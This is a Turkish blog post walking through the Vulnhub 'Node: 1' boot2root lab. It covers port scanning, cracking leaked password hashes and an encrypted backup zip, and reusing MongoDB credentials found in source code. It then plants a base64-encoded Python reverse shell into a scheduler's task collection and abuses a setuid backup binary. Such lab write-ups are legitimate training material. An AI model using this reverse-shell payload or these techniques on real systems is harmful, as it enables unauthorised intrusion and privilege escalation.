{"id":1312,"date":"2021-07-07T14:50:12","date_gmt":"2021-07-07T14:50:12","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1312"},"modified":"2021-07-07T14:50:12","modified_gmt":"2021-07-07T14:50:12","slug":"node-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/07\/node-1\/","title":{"rendered":"NODE: 1"},"content":{"rendered":"

Makine Hakk\u0131nda Bilgiler<\/h2>\n

A\u00e7\u0131klama:<\/strong>
\nDescription: Node is a medium level boot2root challenge, originally created for HackTheBox. There are two flags to find (user and root flags) and multiple different technologies to play with. The OVA has been tested on both VMware and Virtual Box.<\/p>\n

Vulnhub Sayfas\u0131:<\/strong>
\nhttps:\/\/www.vulnhub.com\/entry\/node-1,252\/<\/a><\/p>\n

\u0130ndirme Sayfas\u0131:<\/strong>
\nhttps:\/\/download.vulnhub.com\/node\/Node.ova<\/a><\/p>\n

Walkthrough<\/h2>\n

Makineyi tespit ederek ba\u015flayal\u0131m.<\/p>\n

\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# arp-scan -l | grep "08:00:27:b8:f3:33"\n192.168.110.4   08:00:27:b8:f3:33   PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# ifconfig eth0\neth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\n        inet 192.168.110.3  netmask 255.255.255.0  broadcast 192.168.110.255\n        inet6 fe80::a00:27ff:fe8b:5efb  prefixlen 64  scopeid 0x20<link>\n        ether 08:00:27:8b:5e:fb  txqueuelen 1000  (Ethernet)\n        RX packets 62  bytes 9857 (9.6 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 5567  bytes 336524 (328.6 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n<\/code><\/pre>\n
nmap taramas\u0131 ile devam edelim.<\/p>\n
[*] Scan: 168\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-07 09:10 EDT\nNmap scan report for 192.168.110.4\nHost is up (0.00096s latency).\nNot shown: 65533 filtered ports\nPORT     STATE SERVICE         VERSION\n22\/tcp   open  ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)\n|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)\n|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)\n3000\/tcp open  hadoop-datanode Apache Hadoop\n| hadoop-datanode-info: \n|_  Logs: \/login\n| hadoop-tasktracker-info: \n|_  Logs: \/login\n|_http-title: MyPlace\nMAC Address: 08:00:27:B8:F3:33 (Oracle VirtualBox virtual NIC)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.96 ms 192.168.110.4\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 104.58 seconds\n<\/code><\/pre>\n
3000 de \u00e7al\u0131\u015fan bir nodejs uygulamam\u0131z var. i\u00e7erisinde biraz gezindikten sonra burp ile trafi\u011fi analiz etmeye ba\u015flad\u0131m ve ilgin\u00e7 bir api cevab\u0131 yakalad\u0131m.<\/p>\n
GET \/api\/users\/latest HTTP\/1.1\nHost: 192.168.110.4:3000\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: connect.sid=s%3AAIG_kuzVAZJ3cGqwPpRU9i8TSa6787wQ.P24GUCYwUu%2Fx08mlqD1orDQXT29wYaR398WH4hvG9T0\nUpgrade-Insecure-Requests: 1\n<\/code><\/pre>\n
HTTP\/1.1 200 OK\nX-Powered-By: Express\nContent-Type: application\/json; charset=utf-8\nContent-Length: 611\nETag: W\/"263-mJMXKDfX6c4pdWF3bLjHuBIvsM0"\nDate: Wed, 07 Jul 2021 09:14:42 GMT\nConnection: close\n\n[{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]<\/code><\/pre>\n
Buradaki kullan\u0131c\u0131lardan baz\u0131lar\u0131n\u0131n hashlerini internetten k\u0131rd\u0131m<\/p>\n
tom = f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob\nmark = de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake<\/code><\/pre>\n
Ancak sisteme giri\u015f yapt\u0131\u011f\u0131mda bana login olmama ra\u011fmen bir uyar\u0131 veriyordu ve san\u0131r\u0131m bir backup dosyas\u0131 var. Bu kullan\u0131c\u0131larla bu backup dosyas\u0131n\u0131 indiremiyordum. Bunun \u00fczerine inceleme yapmaya devam ettim ve kendim \/api\/users\/<\/strong> api'\u0131na istek att\u0131\u011f\u0131mda yeni bir kullan\u0131c\u0131 bulum. Daha sonra bu kullan\u0131c\u0131n\u0131n hash'ini k\u0131rd\u0131m ve bununla login oldu\u011fumda bir backup dosyas\u0131 indirdim.<\/p>\n
HTTP\/1.1 200 OK\nX-Powered-By: Express\nContent-Type: application\/json; charset=utf-8\nContent-Length: 611\nETag: W\/"263-mJMXKDfX6c4pdWF3bLjHuBIvsM0"\nDate: Wed, 07 Jul 2021 09:14:42 GMT\nConnection: close\n\n[{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]<\/code><\/pre>\n
myP14ceAdm1nAcc0uNT = dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester<\/code><\/pre>\n
Kullan\u0131c\u0131lar\u0131n hi\u00e7 birinin ssh eri\u015fimi yoktu. Bunun \u00fczerine backup dosyas\u0131 ile ilgileneye ba\u015flad\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# file myplace.backup                     \nmyplace.backup: ASCII text, with very long lines, with no line terminators\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# cat myplace.backup | base64 -d >> result\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# file result                             \nresult: Zip archive data, at least v1.0 to extract\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# unzip result                            \nArchive:  result\n[result] var\/www\/myplace\/package-lock.json password:   <\/code><\/pre>\n
G\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere bir \u015fifreli zip'le kar\u015f\u0131kar\u015f\u0131yay\u0131z. Bunun \u00fczerine john kulland\u0131m ve \u015fifreyi k\u0131rd\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# \/usr\/sbin\/zip2john result >> result-hash 2>\/dev\/null\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# cat result-hash                         \nresult:$pkzip2$3*2*1*0*8*24*9c88*1223*d3839f108d43fbf4655350f9e7b689cb6a888ebe30027e275c13ee723df07d2de2eda50a*1*0*8*24*37ef*0145*a149d75e6d8ac49cf9e74103048490c2f6e38c814f5f9a35c706d2a1e79945e40b903105*2*0*11*5*118f1dfc*94cb*67*0*11*118f*3d0f*71f9f028888da1a229e6d407e5852a8aff*$\/pkzip2$::result:var\/www\/myplace\/node_modules\/qs\/.eslintignore, var\/www\/myplace\/node_modules\/serve-static\/README.md, var\/www\/myplace\/package-lock.json:result\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# rm -rf \/root\/.john        \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# john result-hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt  \nCreated directory: \/root\/.john\nUsing default input encoding: UTF-8\nLoaded 1 password hash (PKZIP [32\/64])\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nmagicword        (result)\n1g 0:00:00:00 DONE (2021-07-07 09:23) 33.33g\/s 6144Kp\/s 6144Kc\/s 6144KC\/s sandrea..joan08\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed\n<\/code><\/pre>\n
Art\u0131k i\u00e7ini a\u00e7abiliriz.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# unzip result                                                                                                                                                                                                                         80 \u2a2f\nArchive:  result\n[result] var\/www\/myplace\/package-lock.json password: \n\n....\n  inflating: var\/www\/myplace\/static\/vendor\/angular\/angular-route.min.js  \n  inflating: var\/www\/myplace\/static\/vendor\/angular\/angular.min.js  \n   creating: var\/www\/myplace\/static\/vendor\/bootstrap\/\n   creating: var\/www\/myplace\/static\/vendor\/bootstrap\/css\/\n  inflating: var\/www\/myplace\/static\/vendor\/bootstrap\/css\/bootstrap.min.css  \n  inflating: var\/www\/myplace\/static\/vendor\/bootstrap\/css\/bootstrap.css  \n   creating: var\/www\/myplace\/static\/vendor\/bootstrap\/fonts\/\n  inflating: var\/www\/myplace\/static\/vendor\/bootstrap\/fonts\/glyphicons-halflings-regular.eot  \n  inflating: var\/www\/myplace\/static\/vendor\/bootstrap\/fonts\/glyphicons-halflings-regular.svg  \n  inflating: var\/www\/myplace\/static\/vendor\/bootstrap\/fonts\/glyphicons-halflings-regular.ttf  \n  inflating: var\/www\/myplace\/static\/vendor\/bootstrap\/fonts\/glyphicons-halflings-regular.woff  \n  inflating: var\/www\/myplace\/static\/vendor\/bootstrap\/fonts\/glyphicons-halflings-regular.woff2  \n   creating: var\/www\/myplace\/static\/vendor\/bootstrap\/js\/\n  inflating: var\/www\/myplace\/static\/vendor\/bootstrap\/js\/bootstrap.min.js  \n  inflating: var\/www\/myplace\/static\/vendor\/bootstrap\/js\/bootstrap.js  \n   creating: var\/www\/myplace\/static\/assets\/\n   creating: var\/www\/myplace\/static\/assets\/css\/\n  inflating: var\/www\/myplace\/static\/assets\/css\/freelancer.css  \n  inflating: var\/www\/myplace\/static\/assets\/css\/app.css  \n  inflating: var\/www\/myplace\/static\/assets\/css\/freelancer.min.css  \n   creating: var\/www\/myplace\/static\/assets\/js\/\n   creating: var\/www\/myplace\/static\/assets\/js\/misc\/\n  inflating: var\/www\/myplace\/static\/assets\/js\/misc\/freelancer.min.js  \n   creating: var\/www\/myplace\/static\/assets\/js\/app\/\n  inflating: var\/www\/myplace\/static\/assets\/js\/app\/app.js  \n   creating: var\/www\/myplace\/static\/assets\/js\/app\/controllers\/\n  inflating: var\/www\/myplace\/static\/assets\/js\/app\/controllers\/admin.js  \n  inflating: var\/www\/myplace\/static\/assets\/js\/app\/controllers\/profile.js  \n  inflating: var\/www\/myplace\/static\/assets\/js\/app\/controllers\/login.js  \n  inflating: var\/www\/myplace\/static\/assets\/js\/app\/controllers\/home.js  \n   creating: var\/www\/myplace\/static\/partials\/\n  inflating: var\/www\/myplace\/static\/partials\/admin.html  \n  inflating: var\/www\/myplace\/static\/partials\/login.html  \n  inflating: var\/www\/myplace\/static\/partials\/home.html  \n  inflating: var\/www\/myplace\/static\/partials\/profile.html  \n  inflating: var\/www\/myplace\/app.html  \n<\/code><\/pre>\n
Proje i\u00e7erisinden mark kullan\u0131c\u0131s\u0131n\u0131n parolas\u0131n\u0131 elde ettim ve ssh ile ba\u011flanabildim.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/\u2026\/node\/var\/www\/myplace]\n\u2514\u2500# ls\napp.html  app.js  node_modules  package.json  package-lock.json  static\n\n\u250c\u2500\u2500(root💀kali)-[~\/\u2026\/node\/var\/www\/myplace]\n\u2514\u2500# cat app.js     \n\nconst express     = require('express');\nconst session     = require('express-session');\nconst bodyParser  = require('body-parser');\nconst crypto      = require('crypto');\nconst MongoClient = require('mongodb').MongoClient;\nconst ObjectID    = require('mongodb').ObjectID;\nconst path        = require("path");\nconst spawn        = require('child_process').spawn;\nconst app         = express();\nconst url         = 'mongodb:\/\/mark:5AYRft73VtFpc84k@localhost:27017\/myplace?authMechanism=DEFAULT&authSource=myplace';\nconst backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';\n\nMongoClient.connect(url, function(error, db) {\n  if (error || !db) {\n    console.log('[!] Failed to connect to mongodb');\n    return;\n...<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[~\/\u2026\/node\/var\/www\/myplace]\n\u2514\u2500# ssh mark@192.168.110.4                      \nmark@192.168.110.4's password: \n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\n              .-. \n        .-'``(|||) \n     ,`\\ \\    `-`.                 88                         88 \n    \/   \\ '``-.   `                88                         88 \n  .-.  ,       `___:      88   88  88,888,  88   88  ,88888, 88888  88   88 \n (:::) :        ___       88   88  88   88  88   88  88   88  88    88   88 \n  `-`  `       ,   :      88   88  88   88  88   88  88   88  88    88   88 \n    \\   \/ ,..-`   ,       88   88  88   88  88   88  88   88  88    88   88 \n     `.\/ \/    .-.`        '88888'  '88888'  '88888'  88   88  '8888 '88888' \n        `-..-(   ) \n              `-` \n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\nLast login: Wed Jul  7 11:10:20 2021 from 192.168.110.3\nmark@node:~$ <\/code><\/pre>\n
Yukar\u0131daki bilgilerden bir mongo db ba\u011flant\u0131s\u0131 oldu\u011funu anl\u0131yoruz. \u0130\u00e7eri girip kontrol etti\u011fimde 127.0.0.1'de bir mongo db'nin \u00e7al\u0131\u015ft\u0131\u011f\u0131n\u0131da g\u00f6rd\u00fcm.<\/p>\n
\u0130\u00e7eride biraz gezindikten sonra enum scriptlerimi \u00e7al\u0131\u015ft\u0131rd\u0131m ve elde etti\u011fim ilgin\u00e7 sonu\u00e7lar a\u015fa\u011f\u0131dad\u0131r.<\/p>\n
[*] usr020 Are there other users in an administrative groups?.............. yes!\n---\nsudo:x:27:tom\n---<\/code><\/pre>\n
[!] fst020 Uncommon setuid binaries........................................ yes!\n---ore--(7%)\n\/usr\/local\/bin\/backup\n---ore--(7%)\n<\/code><\/pre>\n
================================================================( network )=====\n[*] net000 Services listening only on localhost............................ yes!\n---\ntcp    LISTEN     0      128    127.0.0.1:27017                 *:*                  \n---<\/code><\/pre>\n
------ tom ------\n\nSTART      PID     USER COMMAND\n09:18     1170      tom \/usr\/bin\/node \/var\/www\/myplace\/app.js\n09:18     1161      tom \/usr\/bin\/node \/var\/scheduler\/app.js\n<\/code><\/pre>\n
San\u0131yorumki makine tom kullan\u0131c\u0131s\u0131na ge\u00e7i\u015f yapmam\u0131z\u0131 istiyor. Ayr\u0131ca tom sudo \u00fcyesi. Bunun \u00fczerine tom kullan\u0131c\u0131s\u0131na odakland\u0131m. Normal haricinde \u00e7al\u0131\u015fan birde \/var\/scheduler\/app.js<\/strong> projesini g\u00f6rd\u00fcm.<\/p>\n
mark@node:\/home\/tom$ cat \/var\/scheduler\/app.js\nconst exec        = require('child_process').exec;\nconst MongoClient = require('mongodb').MongoClient;\nconst ObjectID    = require('mongodb').ObjectID;\nconst url         = 'mongodb:\/\/mark:5AYRft73VtFpc84k@localhost:27017\/scheduler?authMechanism=DEFAULT&authSource=scheduler';\n\nMongoClient.connect(url, function(error, db) {\n  if (error || !db) {\n    console.log('[!] Failed to connect to mongodb');\n    return;\n  }\n\n  setInterval(function () {\n    db.collection('tasks').find().toArray(function (error, docs) {\n      if (!error && docs) {\n        docs.forEach(function (doc) {\n          if (doc) {\n            console.log('Executing task ' + doc._id + '...');\n            exec(doc.cmd);\n            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });\n          }\n        });\n      }\n      else if (error) {\n        console.log('Something went wrong: ' + error);\n      }\n    });\n  }, 30000);\n\n});<\/code><\/pre>\n
Kaynak kodlar\u0131n\u0131 okudu\u011fumuzda her 30000 mili saniyede bir mongo db'de scheduler<\/strong> database'inde tasks<\/strong> collection'undaki cmd<\/strong> verisini \u00e7al\u0131\u015ft\u0131rmakta. Kaynak kodlardan connection string'imizde oldu\u011fu i\u00e7in db'ye ba\u011fland\u0131m. Birka\u00e7 deneme yapt\u0131m ancak nc ile reverse alamad\u0131m. Bunun \u00fczerine python ve base64 kombininiden reverse ald\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# nano payload                  \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# cat payload \npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.3",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("\/bin\/bash")'\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# cat payload | base64 >> payloadBase64\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# cat payloadBase64                    \ncHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNv\nY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xMTAu\nMyIsMTgyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29z\nLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpJwo=\n<\/code><\/pre>\n
Evet yukar\u0131daki haz\u0131rl\u0131k sonucunda echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xMTAuMyIsMTgyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpJwo= | base64 -d | bash<\/code> payload'\u0131 ile reverse alabiliriz.<\/p>\n
Mongo'ya ba\u011flanal\u0131m. Tabi \u00f6ncesinde nc ile dinleme noktam\u0131z\u0131 ba\u015flatal\u0131m.<\/p>\n
mark@node:\/home\/tom$ mongo mongodb:\/\/localhost:27017\/scheduler?authSource=scheduler --username mark --password 5AYRft73VtFpc84k\nMongoDB shell version: 3.2.16\nconnecting to: mongodb:\/\/localhost:27017\/scheduler?authSource=scheduler\n> show collections\ntasks\n> db.tasks.insert({"cmd":"echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xMTAuMyIsMTgyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpJwo= | base64 -d | bash"})\nWriteResult({ "nInserted" : 1 })<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# nc -lvp 1822\nlistening on [any] 1822 ...\nid\n192.168.110.4: inverse host lookup failed: Host name lookup failure\nconnect to [192.168.110.3] from (UNKNOWN) [192.168.110.4] 53306\nid\nTo run a command as administrator (user "root"), use "sudo <command>".\nSee "man sudo_root" for details.\n\ntom@node:\/$ id\nuid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1002(admin)\ntom@node:\/$ <\/code><\/pre>\n
Harika! \u0130lk flagi alal\u0131m o zaman.<\/p>\n
tom@node:\/$ id\nuid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1002(admin)\ntom@node:\/$ pwd\npwd\n\/\ntom@node:\/$ cd \/home\ncd \/home\ntom@node:\/home$ ls\nls\nfrank  mark  tom\ntom@node:\/home$ cd tom\ncd tom\ntom@node:~$ ls\nls\nuser.txt\ntom@node:~$ cat user.txt\ncat user.txt\ne1156acc3574e04b06908ecf76be91b1<\/code><\/pre>\n
tom kullan\u0131c\u0131s\u0131 ile incelemeler yaparken a\u015fa\u011f\u0131daki sonucu buldum.<\/p>\n
tom@node:~$ ls -al \/usr\/local\/bin\/backup\nls -al \/usr\/local\/bin\/backup\n-rwsr-xr-- 1 root admin 16484 Sep  3  2017 \/usr\/local\/bin\/backup\ntom@node:~$ \n\ntom@node:~$ cat \/etc\/group | grep admin\ncat \/etc\/group | grep admin\nlpadmin:x:115:tom\nadmin:x:1002:tom,root<\/code><\/pre>\n
Ayn\u0131 zamanda 3000. portta \u00e7al\u0131\u015fan nodejs uygulamas\u0131n\u0131n kaynak kodlar\u0131nda bu doysa kullan\u0131lmakta...<\/p>\n
...\nconst backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';\n...\n app.get('\/api\/admin\/backup', function (req, res) {\n    if (req.session.user && req.session.user.is_admin) {\n      var proc = spawn('\/usr\/local\/bin\/backup', ['-q', backup_key, __dirname ]);\n      var backup = '';\n\n      proc.on("exit", function(exitCode) {\n        res.header("Content-Type", "text\/plain");\n        res.header("Content-Disposition", "attachment; filename=myplace.backup");\n        res.send(backup);\n      });\n\n      proc.stdout.on("data", function(chunk) {\n        backup += chunk;\n      });\n\n      proc.stdout.on("end", function() {\n      });\n    }\n    else {\n      res.send({\n        authenticated: false\n      });\n    }\n  });\n\n  app.use(function(req, res, next){\n    res.sendFile('app.html', { root: __dirname });\n  });\n<\/code><\/pre>\n
Bir deneme yapt\u0131m ve ba\u015far\u0131l\u0131 oldum. \u015euan da istedi\u011fim dosyay\u0131 okuyabiliyorum.<\/p>\n
tom@node:~$ \/usr\/local\/bin\/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 \/home\/tom\/user.txt\n<4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 \/home\/tom\/user.txt         \nUEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAA4auXGEOS4yfI2nb9XesHFE\/b4HIcUdOHuq3W8XQYS+ruCXOnq028OZDlxi2dUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA=tom@node:~$ <\/code><\/pre>\n
Bunun \u00fczerine:<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# echo UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAA4auXGEOS4yfI2nb9XesHFE\/b4HIcUdOHuq3W8XQYS+ruCXOnq028OZDlxi2dUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA= | base64 -d\nPK\n    \ufffd}#K\ufffd\ufffd-!home\/tom\/user.txtUT ^\ufffdYG\ufffd\ufffd`ux\n                                                 \ufffd\u1ad7C\ufffd\ufffd'\ufffd\ufffdv\ufffd]\ufffdO\ufffd\ufffdrQ\u04c7\ufffd\ufffd\ufffd\ufffdtK\ufffd\ufffd    s\ufffd\ufffdM\ufffd9\ufffd\ufffd\ufffd-\ufffdP\ufffd\ufffd-!PK\n    \ufffd}#K\ufffd\ufffd-!\ufffd\ufffdhome\/tom\/user.txtUT^\ufffdYux\n                                          \ufffdPKW\ufffd                                                                                                                                                                                                                                              \n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# echo UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAA4auXGEOS4yfI2nb9XesHFE\/b4HIcUdOHuq3W8XQYS+ruCXOnq028OZDlxi2dUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA= | base64 -d >> test.zip\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# unzip test.zip \nArchive:  test.zip\n[test.zip] home\/tom\/user.txt password: \n extracting: home\/tom\/user.txt       \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# ls          \ngobuster1  hash  home  hydra-ssh  istek  myplace.backup  passwords  payload  payloadBase64  result  result-hash  result.zip  test.zip  users  var\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# cd home                          \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node\/home]\n\u2514\u2500# ls\ntom\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node\/home]\n\u2514\u2500# cd tom  \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node\/home\/tom]\n\u2514\u2500# ls\nuser.txt\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node\/home\/tom]\n\u2514\u2500# cat user.txt \ne1156acc3574e04b06908ecf76be91b1\n<\/code><\/pre>\n
Ayn\u0131 nodejs uygulamas\u0131ndan indirirken yapt\u0131\u011f\u0131m\u0131z i\u015fleri tekrarlad\u0131k. Bunun \u00fczeri,ne direkt olarak root klas\u00f6r\u00fcn\u00fc okuyabilirim ama o zaman root olmam\u0131\u015f olaca\u011f\u0131m. \u0130lgin bir ikilem. Makine flagi okumam\u0131 istiyorsa tamam ama ben root olmak istiyorum.<\/p>\n
\u00d6ncelikle yan\u0131lm\u0131\u015f\u0131m... \ud83d\ude00<\/p>\n
\u0130stedi\u011fimiz her path'i okuyam\u0131yoruz. Bunun sebebi kod i\u00e7erisinde anlad\u0131\u011f\u0131m kadar\u0131yla baz\u0131 k\u0131s\u0131tlamalar var. Okuyabildi\u011fim bir dosyan\u0131n de\u011fi\u015fkenlerine bakt\u0131\u011f\u0131mda a\u015fa\u011f\u0131daki sonular\u0131 ald\u0131m.<\/p>\n
